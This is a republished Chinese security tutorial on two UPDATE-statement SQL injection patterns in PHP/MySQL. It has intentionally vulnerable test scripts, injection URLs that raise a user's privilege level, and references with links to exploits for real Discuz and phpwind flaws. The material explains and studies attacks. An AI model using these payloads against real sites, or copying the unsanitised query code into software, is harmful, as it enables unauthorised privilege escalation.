UPDATE注射(mysql+php)的兩個模式

最後更新：2018-12-08 來源：互聯網

上載者：User

創建阿里雲帳戶，並獲得超過 40 款產品的免費試用版；而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊！

UPDATE注射(mysql+php)的兩個模式

文/安全天使·SuperHei 2005.8.11

一.測試環境：

OS: Windowsxp sp2

php: php 4.3.10 (

mysql 4.1.9

apache 1.3.33

二.測試資料庫結構：

-----start---

-- 資料庫: `test`

--

-- --------------------------------------------------------

--

-- 表的結構 `userinfo`

--

CREATE TABLE `userinfo` (

`groudid` varchar(12) NOT NULL default '1',

`user` varchar(12) NOT NULL default 'heige',

`pass` varchar(122) NOT NULL default '123456'

) ENGINE=MyISAM DEFAULT CHARSET=latin1;

--

-- 匯出表中的資料 `userinfo`

--

INSERT INTO `userinfo` VALUES ('2', 'heige', '123456');

------end-------

三.測試模式：

1,變數沒有帶''或""[MOD1]

<?php

//test1.php Mod1

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("資料庫連接失敗");

$sql = "update userinfo set pass=$p where user='heige'";//<--$P沒有使用單引號

$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "<p>SQL Query:$sql<p>";

?>

指令碼裡只是修改user='heige'的pass，如果groudid表示使用者的許可權等級，我們的目的就是通過構造$p 來達

到修改groupid的目的：

那麼我們提交：http://127.0.0.1/test1.php?p=123456,groudid=1

使用者heige的groudid又2改為1了

所以我們可以得到沒有''或"" update的注射是可以成功的，這個就是我們的模式1。

2,變數帶''或""[MOD2]

<?php

//test2.php

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("資料庫連接失敗");

$sql = "update userinfo set pass='$p' where user='heige'";//<--$P使用單引號

$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "<p>SQL Query:$sql<p>";

?>

為了關閉'我們構造$p應該為123456',groudid='2 提交：

http://127.0.0.1/test2.php?p=123456',groudid='1 在gpc=on的情況下'變成了\'

提交的語句變成：SQL Query:update userinfo set pass='123456\',groudid=\'1' where user='heige'

groudid並沒有被修改。那麼在變數被''或""時就完全沒有被注射呢？不是下面我們看模式2：

<?php

//test3.php Mod2

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("資料庫連接失敗");

$sql = "update userinfo set pass='$p' where user='heige'";//<--$P使用單引號

$result = mysql_db_query($dbname, $sql);

mysql_fetch_array($result); //$p的資料寫入資料庫

$sql= "select pass from userinfo where user='heige'";

$result = mysql_db_query($dbname, $sql);

$userinfo=mysql_fetch_array($result);

echo $userinfo[0]; //把pass查詢輸出給$userinfo[0]

$sql ="update userinfo set pass='$userinfo[0]' where user='heige'";

$result = mysql_db_query($dbname, $sql);

mysql_fetch_array($result); //把$userinfo[0] 再次update

HaHa~~ 成功注射修改groudid為1。這個就是我們的模式2了，簡單的描敘如下：

update-->select-->update

四.實際模式

模式1：Discuz 2.0/2.2 register.php 注射

漏洞分析：http://4ngel.net/article/41.htm

Discuz 2.0/2.2 register.php Remote Exploit ：http://4ngel.net/project/discuz_reg.htm

模式2：phpwind 2.0.2和3.31e 許可權提升漏洞

漏洞分析：

update (profile.php 注射變數為$proicon update語句裡為,icon='$userdb[icon]'）

v

select (jop.php)

v

updtate (jop.php)

Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe

五.鳴謝

特別感謝saiy等朋友的討論和協助。Thanks!!!

本文章原先以中文撰寫並發佈於 aliyun.com，亦設英文版本，僅作資訊用途。本網站不對文章的準確性，完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴，請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡，一經驗證之後，即會刪除該侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More